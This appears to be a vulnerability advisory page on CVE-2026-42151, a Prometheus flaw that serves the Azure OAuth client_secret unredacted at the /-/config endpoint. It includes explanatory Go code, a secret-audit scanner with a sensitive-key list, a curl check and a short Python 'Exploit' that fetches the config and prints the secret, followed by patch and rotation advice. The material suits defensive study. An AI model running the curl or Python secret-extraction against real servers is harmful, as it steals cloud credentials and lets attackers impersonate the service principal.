Prometheus, Information Exposure, CVE-2026-42151 (High)


The vulnerability, identified as CVE-2026-42151, arises in the `azuread` OAuth section of Prometheus's remote write configuration. That section includes a `client_secret` field which was declared as a plain `string` instead of Prometheus's internal `Secret` type. Prometheus serves its currently loaded configuration over the `/-/config` HTTP endpoint.
This endpoint redacts every field of the `Secret` type, replacing its value with a placeholder, so that credentials in the loaded configuration are not leaked. Because `client_secret` was a plain string, that redaction never applied to it.
Consequently, an HTTP GET request to `/-/config` on an affected server returns the configuration with all other credentials redacted but the Azure OAuth `client_secret` in plaintext, readable by anyone who can reach the endpoint over the network or who has access to the host.
An attacker who obtains the `client_id` and `client_secret` (the tenant ID sits in the same configuration section) can authenticate to Azure AD as Prometheus's service principal using the OAuth 2.0 client credentials flow. That identity is the one Prometheus uses for remote write, so the attacker can push metrics to the remote write target as Prometheus (poisoning monitoring data), read monitoring data where the identity has such rights, and exercise any other permissions the service principal holds in the tenant, including access to other integrated cloud services.
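The mechanism described above, as an added example written for this article rather than code from Prometheus: a self-redacting `Secret` string type next to a config struct that declares `client_secret` as a plain `string` and the same struct with the field typed as `Secret`. Both are serialized by one generic dump routine that, like a config-serving endpoint, knows nothing about which fields are sensitive. The type names, the `<secret>` placeholder and the sample credential values are assumptions for the illustration; only the type of the field differs between the vulnerable and fixed structs.

```go
package main

import (
	"bytes"
	"encoding/json"
	"fmt"
	"strings"
)

// Secret is a self-redacting string type, written here to mirror the idea
// behind Prometheus's internal secret type. It is an illustration for this
// article, not the project's own code.
type Secret string

// Placeholder emitted in place of any non-empty Secret value.
const redacted = "<secret>"

// MarshalJSON is what makes the type safe to dump: a non-empty Secret is
// always serialized as the placeholder, never as its contents.
func (s Secret) MarshalJSON() ([]byte, error) {
	if s == "" {
		return json.Marshal("")
	}
	// Raw JSON string; written directly so the '<' and '>' are not escaped.
	return []byte(`"` + redacted + `"`), nil
}

// VulnerableOAuth models the flawed definition: client_secret is a plain
// string, so the default marshaller writes it out verbatim.
type VulnerableOAuth struct {
	ClientID     string `json:"client_id"`
	ClientSecret string `json:"client_secret"`
	TenantID     string `json:"tenant_id"`
}

// FixedOAuth is the same struct with the field typed as Secret. Nothing in
// the dumping code changes; the redaction follows from the type alone.
type FixedOAuth struct {
	ClientID     string `json:"client_id"`
	ClientSecret Secret `json:"client_secret"`
	TenantID     string `json:"tenant_id"`
}

// DumpConfig stands in for a config-serving endpoint: it serializes
// whatever it is given and has no list of sensitive fields.
func DumpConfig(cfg any) string {
	var buf bytes.Buffer
	enc := json.NewEncoder(&buf)
	enc.SetEscapeHTML(false) // keep "<secret>" readable instead of \u003csecret\u003e
	if err := enc.Encode(cfg); err != nil {
		panic(err)
	}
	return strings.TrimSpace(buf.String())
}

// Leaks reports whether a dump still contains the raw credential.
func Leaks(dump, secret string) bool {
	return strings.Contains(dump, secret)
}

func main() {
	// Constructed sample values; the secret is a hypothetical placeholder.
	const clientID = "11111111-1111-1111-1111-111111111111"
	const tenantID = "22222222-2222-2222-2222-222222222222"
	const secret = "hypothetical-client-secret-value"

	vuln := DumpConfig(VulnerableOAuth{ClientID: clientID, ClientSecret: secret, TenantID: tenantID})
	fixed := DumpConfig(FixedOAuth{ClientID: clientID, ClientSecret: Secret(secret), TenantID: tenantID})

	fmt.Println("plain string :", vuln, "leaks:", Leaks(vuln, secret))
	fmt.Println("Secret type  :", fixed, "leaks:", Leaks(fixed, secret))
}
```

The point of the example is that the redaction control lives on the type, not on the endpoint: any credential stored in a plain `string` silently falls outside the control, which is why reviewers of config structs should check every credential-bearing field's type rather than the serving code.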

DailyCVE Form

Platform: Prometheus
Version: <3.5.3 (3.5 LTS line); 3.6.0 to 3.11.2
Vulnerability: OAuth secret leak
Severity: High (7.5 CVSS)
date: 2026-05-04

Prediction: 2026-05-04

Analytics under What Undercode Say:

This vulnerability is a classic example of improper handling of sensitive data in a public API. The failure to use the specialized secret type for a sensitive OAuth credential bypassed the built-in redaction control. Analysts should prioritize patching and rotating the exposed credential, as the `/-/config` endpoint is often reachable for debugging purposes and is an easy reconnaissance target for lateral movement.

Bash command to check Prometheus version
prometheus --version
Bash command to test for exposure (use only on systems you are authorized to test)
curl -s http://<prometheus-host>:9090/-/config | grep -E 'client_secret:'
A patched server prints the value as `<secret>`; a vulnerable one prints the credential itself.
Git command to list the files touched by the fix commit (the change is in the azuread remote write code)
git show --name-only <commit-hash> | grep azuread
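The exposure check above generalizes to every credential field a served configuration may contain. The following audit is an added example written for this article, not code from Prometheus or from the page: it scans a configuration dump line by line and reports any sensitive key whose value is not the `<secret>` placeholder. The list of sensitive keys and both sample configurations are constructed for the illustration. The page names `/-/config`; if you pull the configuration through the `/api/v1/status/config` API instead, it arrives in a JSON envelope, which `YAMLFromStatusConfig` unwraps first.

```go
package main

import (
	"encoding/json"
	"fmt"
	"regexp"
	"strings"
)

// sensitiveKeys lists configuration keys whose values must never appear in a
// served config. The set is an assumption for this audit, not taken from
// Prometheus; extend it for your own configuration.
var sensitiveKeys = map[string]bool{
	"client_secret": true,
	"password":      true,
	"bearer_token":  true,
	"secret_key":    true,
	"credentials":   true,
}

// keyValue matches "key: value" lines, including list items ("- key: value").
var keyValue = regexp.MustCompile(`^\s*(?:-\s+)?([A-Za-z_]+):(.*)$`)

// UnredactedSecrets scans served YAML and returns one finding per sensitive
// key whose value is anything other than the <secret> placeholder.
func UnredactedSecrets(yamlText string) []string {
	var findings []string
	for i, line := range strings.Split(yamlText, "\n") {
		m := keyValue.FindStringSubmatch(line)
		if m == nil || !sensitiveKeys[m[1]] {
			continue
		}
		value := strings.Trim(strings.TrimSpace(m[2]), `"'`)
		if value == "" || value == "<secret>" {
			continue // nested block or properly redacted value
		}
		findings = append(findings, fmt.Sprintf("line %d: %s is served in plaintext", i+1, m[1]))
	}
	return findings
}

// YAMLFromStatusConfig unwraps the JSON envelope that Prometheus's
// /api/v1/status/config endpoint puts around the configuration YAML.
func YAMLFromStatusConfig(body []byte) (string, error) {
	var resp struct {
		Status string `json:"status"`
		Data   struct {
			YAML string `json:"yaml"`
		} `json:"data"`
	}
	if err := json.Unmarshal(body, &resp); err != nil {
		return "", err
	}
	if resp.Status != "success" {
		return "", fmt.Errorf("unexpected status %q", resp.Status)
	}
	return resp.Data.YAML, nil
}

// Constructed sample of what an affected server would serve. The UUIDs and
// the secret are placeholders, not real credentials.
const vulnerableConfig = `scrape_configs:
  - job_name: node
    basic_auth:
      username: prom
      password: <secret>
remote_write:
  - url: https://example.invalid/api/v1/write
    azuread:
      cloud: AzurePublic
      oauth:
        client_id: 11111111-1111-1111-1111-111111111111
        client_secret: hypothetical-plaintext-secret
        tenant_id: 22222222-2222-2222-2222-222222222222`

// Constructed sample of the same configuration as a patched server serves it.
const patchedConfig = `scrape_configs:
  - job_name: node
    basic_auth:
      username: prom
      password: <secret>
remote_write:
  - url: https://example.invalid/api/v1/write
    azuread:
      cloud: AzurePublic
      oauth:
        client_id: 11111111-1111-1111-1111-111111111111
        client_secret: <secret>
        tenant_id: 22222222-2222-2222-2222-222222222222`

func main() {
	for _, c := range []struct{ name, cfg string }{{"vulnerable", vulnerableConfig}, {"patched", patchedConfig}} {
		findings := UnredactedSecrets(c.cfg)
		fmt.Printf("%s: %d finding(s)\n", c.name, len(findings))
		for _, f := range findings {
			fmt.Println("  ", f)
		}
	}
}
```

On the constructed vulnerable sample the audit flags only `client_secret`, because `basic_auth.password` is already of the `Secret` type and arrives redacted; on the patched sample it reports nothing. Run it over the body returned by your own server to confirm the fix took effect after upgrading.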

Exploit:

An adversary requires network access to the `/-/config` endpoint. A simple HTTP client is enough to retrieve the configuration and extract the secret:

import re
from http.client import HTTPConnection

# Fetch the served configuration; the host is a placeholder for a server you are authorized to test.
conn = HTTPConnection("target-prometheus-host", 9090, timeout=10)
conn.request("GET", "/-/config")
resp = conn.getresponse()
data = resp.read().decode("utf-8", errors="replace")
# A patched server serves the placeholder <secret>; a vulnerable one serves the credential itself.
for line in re.findall(r"client_secret:.*", data):
    print(line.strip())

Protection from this CVE:

Upgrade to Prometheus 3.11.3, or to 3.5.3 on the LTS line. Treat the `client_secret` of any affected server as compromised and rotate it in Azure AD after patching, since patching stops further exposure but does not invalidate a secret that has already been read. As a workaround, migrate authentication to Managed Identity or Workload Identity, which eliminates the client secret entirely. Restrict network access to the `/-/config` endpoint using firewalls or a reverse proxy.

Impact:

A successful attack compromises the Azure AD OAuth client secret, letting an attacker authenticate to Azure AD as the service principal Prometheus uses and act with its permissions against the remote write target and any other service trusting that identity. This can result in data exposure, service disruption through metric poisoning, and unauthorized access to cloud resources.

Sources:

Reported By: github.com